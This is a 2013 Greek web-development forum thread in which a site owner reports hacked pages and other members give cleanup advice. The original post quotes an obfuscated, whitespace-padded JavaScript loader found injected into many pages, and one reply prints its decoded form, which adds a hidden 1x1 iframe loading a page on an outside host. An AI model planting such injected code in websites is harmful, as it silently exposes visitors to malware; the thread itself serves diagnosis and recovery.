Μου hackαρανε την σελίδα

Από που να ξεκινήσω; Που θα βρω; κ.α. γενικές ερωτήσεις για την δημιουργία μιας ιστοσελίδας.

Συντονιστές: WebDev Moderators, Super-Moderators

Απάντηση
Άβαταρ μέλους
selemeles
Δημοσιεύσεις: 464
Εγγραφή: 23 Νοέμ 2006 12:42
Τοποθεσία: Άνω Λιόσια
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από selemeles » 06 Απρ 2013 01:17

Καλησπέρα
Βασικά δεν ήξερα που να βάλω το συγκεκριμένο θέμα, οπότε ας το μεταφέρετε...

Ξαφνικά σε πολλές σελίδες βρήκα αυτό το κώδικα

Κώδικας: Επιλογή όλων

<!--0242d5--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          p=parseInt;ss=&#40;123&#41;?String.fromCharCode&#58;0;asgq="...".replace&#40;/@/g,"9"&#41;.split&#40;"!"&#41;;try&#123;document.body&=0.1&#125;catch&#40;gdsgsdg&#41;&#123;zz=3;dbshre=56;if&#40;dbshre&#41;&#123;vfvwe=0;try&#123;document;&#125;catch&#40;agdsg&#41;&#123;vfvwe=1;&#125;if&#40;!vfvwe&#41;&#123;e=eval;&#125;s="";if&#40;zz&#41;for&#40;i=0;i-480!=0;i++&#41;&#123;if&#40;window.document&#41;s+=ss&#40;p&#40;asgq&#91;i&#93;,16&#41;&#41;;&#125;if&#40;window.document&#41;e&#40;s&#41;;&#125;&#125;</script><!--/0242d5-->
Ξέρει κανείς τι είναι και πως έγινε???
:: Blue Webeyes :: www.bwe.gr
-----------------------------------------------------
έπιπλα κουζίνας

Άβαταρ μέλους
billt
Δημοσιεύσεις: 1175
Εγγραφή: 20 Φεβ 2004 16:17
Τοποθεσία: Θεσσαλονίκη

Μου hackαρανε την σελίδα

Δημοσίευση από billt » 06 Απρ 2013 01:36

Με κανονικό ftp access γίνεται συνήθως και φυτεύει διάφορα στον επισκέπτη του site.
Άλλαξε το ftp password και καθάρισε τον υπολογιστή σου. Αν χρησιμοποιείς filezilla κανε update στην τελευταία έκδοση ή βάλε άλλο client και βέβαια διέγραψε τον κώδικα απ'όλες τα αρχεία στο σερβερ.
Πες την εταιρία που σε φιλοξενεί να τρέξει ένα malwarescan να δεις ποια αρχεία εχουν επηρεαστεί

Άβαταρ μέλους
selemeles
Δημοσιεύσεις: 464
Εγγραφή: 23 Νοέμ 2006 12:42
Τοποθεσία: Άνω Λιόσια
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από selemeles » 06 Απρ 2013 01:40

Χρησιμοποιώ το fireftp του firefox. Αλλιώς τι άλλο να βάλω?
αφερώ τον κώδικα από όλα τα αρχεία...
Η εταιρεία που με φιλοξενεί δεν βρήκε κάποιο virus ή malware !!!
:: Blue Webeyes :: www.bwe.gr
-----------------------------------------------------
έπιπλα κουζίνας

Άβαταρ μέλους
billt
Δημοσιεύσεις: 1175
Εγγραφή: 20 Φεβ 2004 16:17
Τοποθεσία: Θεσσαλονίκη

Μου hackαρανε την σελίδα

Δημοσίευση από billt » 06 Απρ 2013 10:16

Δες πότε εγινε modified το αρχείο με το παραπάνω κωδικα και ψάξε όλα τα αρχεία που τροποιήθηκαν την ιδια μερα, επισης πες τους να δουν αν εχουν access logs για εκεινη τη μερα/ώρα

Άβαταρ μέλους
selemeles
Δημοσιεύσεις: 464
Εγγραφή: 23 Νοέμ 2006 12:42
Τοποθεσία: Άνω Λιόσια
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από selemeles » 06 Απρ 2013 10:31

Το έκανα, αλλά...

Βασικά είμαι στην διαδικασία αλλαγής server.
4/4 έκανα download όλα τα sites και 5/4 (χθες) τα μετέφερα σε άλλον server, όπου και έγινε η αλλαγή DNS. Τα αρχεία "αλλάξαν" στις 3/4 !!! Μια μέρα πριν τα κατεβάσω :(
Μίλησα με εκείνους (hostgator) για να δουν τι είχε γίνει, αλλά η απάντησή τους ήταν ότι δεν είναι σε αυτούς τα DNS. Τους εξήγησα για τις ημερομηνίες (και με τα πολλά παρακάλια) έλεγξαν τον server τους, αλλά δεν βρήκαν κάτι...

Τέσπα, εγώ αλλαζω τώρα όλες τις infected σελίδες (περίπου 180 αρχεία :hammer: :hammer: :hammer: ) και βλέπουμε.

ΥΓ.: Ποιον ftp client να χρησιμοποιώ?
:: Blue Webeyes :: www.bwe.gr
-----------------------------------------------------
έπιπλα κουζίνας

Άβαταρ μέλους
dva_dev
Script Master
Δημοσιεύσεις: 3790
Εγγραφή: 16 Σεπ 2005 01:32
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από dva_dev » 06 Απρ 2013 11:18

selemeles έγραψε:Καλησπέρα
Βασικά δεν ήξερα που να βάλω το συγκεκριμένο θέμα, οπότε ας το μεταφέρετε...

Ξαφνικά σε πολλές σελίδες βρήκα αυτό το κώδικα

Κώδικας: Επιλογή όλων

<!--0242d5-->
...
<!--/0242d5-->
Ξέρει κανείς τι είναι και πως έγινε???
Δες το http://security.stackexchange.com/quest ... ed-code-do
Ο κώδικας στο δικό σου site βάζει αυτό

Κώδικας: Επιλογή όλων

&#40;function &#40;&#41; &#123;
    var oum = document.createElement&#40;'iframe'&#41;;

    oum.src = 'http&#58;//dv8fitness.com/includes/clicker.php';
    oum.style.position = 'absolute';
    oum.style.border = '0';
    oum.style.height = '1px';
    oum.style.width = '1px';
    oum.style.left = '1px';
    oum.style.top = '1px';

    if &#40;!document.getElementById&#40;'oum'&#41;&#41; &#123;
        document.write&#40;'<div id=\'oum\'></div>'&#41;;
        document.getElementById&#40;'oum'&#41;.appendChild&#40;oum&#41;;
    &#125;
&#125;&#41;&#40;&#41;;
Φαντάζομαι το site σου έχει τρύπες και αν δεν τις μπαλώσεις σε όποιο server και να πας το πρόβλημα το βλέπω να ξαναεμφανίζεται.

Άβαταρ μέλους
selemeles
Δημοσιεύσεις: 464
Εγγραφή: 23 Νοέμ 2006 12:42
Τοποθεσία: Άνω Λιόσια
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από selemeles » 06 Απρ 2013 17:24

Τον server δεν τον άλλαξα για αυτό το λόγο, απλά ήταν προγραμματισμένο να τον αλλάξω λόγο κόστους :) Απλά έτυχε την συγκεκριμένη περίοδο....

Όσον αφορά τον κώδικα που είχε προσθέσει, απλά τον αφαίρεσα manual από τον κώδικα. Σωστά;

Το θέμα είναι πως στο γοογλε συνεχίζει να το βγάζει ως malware οπότε δεν με αφήνει να μπω μέσα από τις αναζητήσεις... Συγκεμεκριμένα το site είναι το www.bauerhellas.com Μπορεί καποιος να μου πει πως το ξανακάνω να παίζει στις μηχανές αναζήτησης;;;

Όσον αφορά τις "τρύπες" πως τις βρίσκω;
:: Blue Webeyes :: www.bwe.gr
-----------------------------------------------------
έπιπλα κουζίνας

Apostolis_38
Δημοσιεύσεις: 1969
Εγγραφή: 14 Φεβ 2008 16:20
Τοποθεσία: ΠΕΙΡΑΙΑΣ

Μου hackαρανε την σελίδα

Δημοσίευση από Apostolis_38 » 06 Απρ 2013 20:54

Joomla είναι το site;

Αν ναι, το πρόβλημα είναι πιο σύνθετο.
Ψάξε για αρχεία που δεν ανήκουν στην εφαρμογή και κυρίως σε φακέλους με εικόνες (images, media κ.λ.π.) ή βοηθητικούς (help folder κ.λ.π.)

Και οπωσδήποτε ψάξε τα αρχεία σου (ΟΛΑ) για ύποπτο PHP eval κώδικα.
Για να σιγουρευείς οτι κάτι τρέχει με τον κώδικα πόσταρέ τον εδώ http://ddecode.com/phpdecoder/ και δες τα αποτελέσματα.
Αν σου βγάλει οτι κάτι τρέχει καθάρισε τον κώδικα πριν ξανανεβάσεις τα αρχεία.

Ψάξε τα htaccess αρχεία για ύποπτο κώδικα.
Σε όλους τους φακέλους.

Τσέκαρε το site σου εδώ: http://sucuri.net/

Άβαταρ μέλους
selemeles
Δημοσιεύσεις: 464
Εγγραφή: 23 Νοέμ 2006 12:42
Τοποθεσία: Άνω Λιόσια
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από selemeles » 06 Απρ 2013 21:25

Ευχαριστώ για τις απαντήσεις.
Καταρχήν δεν είναι joomla κλπ, είναι by me :)
Στο site με το scan το βρίσκει καθαρό, και το μόνο αρνητικό είναι ότι είναι blacklisted. (Site blacklisted, malware not identified)

Πως το βγάζω από το black list?
Τα αρχεία htaccess με ftp μπορώ να τα δω?

Ευχαριστώ
:: Blue Webeyes :: www.bwe.gr
-----------------------------------------------------
έπιπλα κουζίνας

Apostolis_38
Δημοσιεύσεις: 1969
Εγγραφή: 14 Φεβ 2008 16:20
Τοποθεσία: ΠΕΙΡΑΙΑΣ

Μου hackαρανε την σελίδα

Δημοσίευση από Apostolis_38 » 06 Απρ 2013 21:31

Πρέπει να μπεις στο google webmaster tools και να ζητήσεις review του site.
Για να μπείς εκεί πρέπει να ανοίξεις account και να δηλώσεις το site σου.

Άβαταρ μέλους
selemeles
Δημοσιεύσεις: 464
Εγγραφή: 23 Νοέμ 2006 12:42
Τοποθεσία: Άνω Λιόσια
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από selemeles » 06 Απρ 2013 22:42

Το εχω κανει μεσα στο webmaster απο χθες αλλά ακομη τιποτα
:: Blue Webeyes :: www.bwe.gr
-----------------------------------------------------
έπιπλα κουζίνας

Apostolis_38
Δημοσιεύσεις: 1969
Εγγραφή: 14 Φεβ 2008 16:20
Τοποθεσία: ΠΕΙΡΑΙΑΣ

Μου hackαρανε την σελίδα

Δημοσίευση από Apostolis_38 » 07 Απρ 2013 10:02

Παίρνει κάποιο χρόνο η διαδικασία.
Απ' ότι θυμάμαι η google δεν αναφέρει συγκεκριμένο χρόνο αλλά σίγουρα θα έχεις "απάντηση".

Άβαταρ μέλους
cordis
Administrator, [F|H]ounder, [C|S]EO
Δημοσιεύσεις: 27622
Εγγραφή: 09 Οκτ 1999 03:00
Τοποθεσία: Greece
Επικοινωνία:

Μου hackαρανε την σελίδα

Δημοσίευση από cordis » 07 Απρ 2013 12:27

Δεν απαντάω σε προσωπικά μηνύματα με ερωτήσεις που καλύπτονται από τις ενότητες του forum. Για ο,τι άλλο είμαι εδώ για εσάς.
- follow me @twitter

Απάντηση

Επιστροφή στο “Γενικές ερωτήσεις κατασκευής ιστοσελίδων”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 2 επισκέπτες